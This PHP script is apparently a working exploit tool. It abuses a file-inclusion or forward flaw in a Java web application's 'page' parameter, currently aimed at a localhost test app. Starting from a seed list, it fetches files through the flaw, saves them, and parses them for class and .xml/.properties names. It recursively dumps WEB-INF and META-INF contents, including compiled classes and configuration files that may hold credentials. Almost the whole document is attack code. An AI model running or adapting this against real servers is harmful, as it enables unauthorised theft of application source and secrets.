<?php
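// Target URL template; checkFile() substitutes each queued path for '$file$'.
$url = 'http://localhost:8080/WebApplication_ForwardTest/index.jsp?page=$file$';
// Captures the whole response body ('s' lets '.' span newlines).
$regexp = '/(.*)/mis';
// Every fetched file is written below this directory, mirroring its path.
$outdir = './out/';
// Seed list of paths, one per line. file() returns false when the seed file
// is unreadable, and count(false) would then fail with a TypeError, so stop
// with a clear message instead.
$queue = file('web-inf.txt');
if ($queue === false) {
    throw new RuntimeException('Cannot read seed list web-inf.txt');
}
// Paths already requested; checkFile() appends to it and skips repeats.
$checked = [];
// LIFO work list: parseFile() pushes newly discovered paths onto $queue.
while (count($queue) != 0) {
    echo 'Queue count = '.count($queue).PHP_EOL;
    $file = trim(array_pop($queue));
    checkFile($file);
}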
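/**
 * Fetch one path through the target URL and save the response under $outdir.
 *
 * Reads the globals $url, $regexp, $outdir and $checked, and appends $file
 * to $checked so each path is requested at most once.
 *
 * @param string $file path relative to the web application root
 * @return bool true when a response was saved, false when the path was
 *              already checked or the fetch returned nothing
 */
function checkFile($file)
{
    global $url, $regexp, $checked, $outdir;

    // Strict comparison so that e.g. '0' and '' are not treated as the same path.
    if (in_array($file, $checked, true)) {
        return false;
    }
    $checked[] = $file;

    // NOTE(review): $file is used unmodified both in the request and in the
    // local output path below; it comes from web-inf.txt or from regex matches
    // on fetched content and is not validated here.
    $target = str_replace('$file$', $file, $url);
    // Warnings for missing/unreachable resources are suppressed on purpose: a
    // miss is reported with the '- ' line below instead of a PHP notice, and
    // the false return is handled explicitly.
    $out = @file_get_contents($target);
    if ($out === false || preg_match($regexp, $out, $m) !== 1 || !isset($m[1]) || $m[1] === '') {
        echo '- '.$file.PHP_EOL;
        return false;
    }
    $result = $m[1];

    $dir = $outdir.dirname($file);
    if (!file_exists($dir)) {
        // 0755 rather than 0777: the dump directory need not be world-writable.
        mkdir($dir, 0755, true);
    }
    file_put_contents($outdir.$file, $result);
    // Look for further paths referenced by the file just saved.
    parseFile($result, dirname($file).'/');
    echo '+ '.$file.PHP_EOL;
    return true;
}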
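/**
 * Scan fetched content for references to other files and append each
 * candidate path to the global work list $queue.
 *
 * Four patterns are tried, each pushing paths below WEB-INF/ (or META-INF/):
 *   1. JVM constant-pool class descriptors of the form Lpkg/Name;
 *   2. dotted class names inside <...-class> elements (web.xml style)
 *   3. dotted or slashed package paths ending in a capitalised segment
 *   4. *.xml / *.properties names, queued under several common WEB-INF
 *      locations plus the directory of the current file
 * Duplicates are not filtered across patterns; checkFile() skips paths it
 * has already seen.
 *
 * @param string $content raw bytes of a fetched file
 * @param string $dirname directory of the fetched file, with trailing '/'
 * @return void
 */
function parseFile($content, $dirname)
{
    global $queue;

    // Unique capture-group-1 matches of $pattern in $content, first-seen order.
    $findAll = function ($pattern) use ($content) {
        preg_match_all($pattern, $content, $m);
        return isset($m[1]) ? array_unique($m[1]) : [];
    };

    # class constant pool: Lpkg/Name;
    foreach ($findAll('/L((?:[a-zA-Z_$][a-zA-Z\d_$]*\/)*[a-zA-Z_$][a-zA-Z\d_$]*);/') as $class) {
        $queue[] = 'WEB-INF/classes/'.$class.'.class';
    }

    # web.xml: <servlet-class>pkg.Name</servlet-class> and similar
    foreach ($findAll('/class>((?:[a-zA-Z_$][a-zA-Z\d_$]*\.)*[a-zA-Z_$][a-zA-Z\d_$]*)<\//') as $class) {
        $queue[] = 'WEB-INF/classes/'.str_replace('.', '/', $class).'.class';
    }

    # class files: dotted or slashed package path ending in a capitalised name
    foreach ($findAll('/((?:[a-z_$][a-z\d_$]*(?:\.|\/))+[A-Z][a-zA-Z\d_$]*)/') as $class) {
        $queue[] = 'WEB-INF/classes/'.str_replace('.', '/', $class).'.class';
    }

    # xml, properties files
    foreach ($findAll('/((?:[a-zA-Z\d\-_$]+\/)*[a-zA-Z\d\-_$]*\.(?:xml|properties))/') as $file) {
        if (startsWith($file, 'WEB-INF') or startsWith($file, 'META-INF')) {
            // Already anchored below WEB-INF/META-INF: queue as-is.
            $queue[] = $file;
            continue;
        }
        // Unanchored name: try the usual locations, then the current directory.
        $prefixes = [
            'WEB-INF/',
            'WEB-INF/classes/',
            'WEB-INF/config/',
            'WEB-INF/conf/',
            'WEB-INF/resources/',
            'META-INF/',
            $dirname,
        ];
        foreach ($prefixes as $prefix) {
            $queue[] = $prefix.$file;
        }
    }
}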
/**
 * True when $haystack begins with $needle (byte-wise, case-sensitive).
 * An empty $needle matches any haystack.
 *
 * @param string $haystack string to inspect
 * @param string $needle   prefix to look for
 * @return bool
 */
function startsWith($haystack, $needle)
{
    // strncmp stops after strlen($needle) bytes, so only the prefix is compared;
    // a haystack shorter than the needle compares unequal.
    return strncmp($haystack, $needle, strlen($needle)) === 0;
}
?>